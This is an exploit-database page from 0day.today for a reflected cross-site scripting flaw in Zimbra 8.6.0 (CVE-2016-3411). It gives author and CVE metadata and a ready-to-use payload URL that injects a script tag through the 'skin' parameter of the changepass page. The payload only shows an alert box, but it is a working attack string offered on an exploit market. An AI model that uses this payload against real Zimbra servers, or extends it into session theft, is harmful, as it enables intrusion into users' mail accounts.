[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Zimbra 8.6.0_GA_1153 - Cross-Site Scripting Vulnerability

Author
Dino Barlattani
Risk
[
Security Risk Low
]
0day-ID
0day-ID-30864
Category
web applications
Date add
11-08-2018
CVE
CVE-2016-3411
Platform
php
# Exploit Title: Xss Zimbra Mail server
# Exploit Author: Dinbar78
# Vendor Homepage: https://www.zimbra.com/
 
# Version: 8.6.0_GA_1153 (build 20141215151110)
# bug 103609 or CVE-2016-3411
 
 
Payload: es.
https:// (zimbrasite)/h/changepass?skin="><script>alert('hacked');</script>

#  0day.today [2024-11-15]  #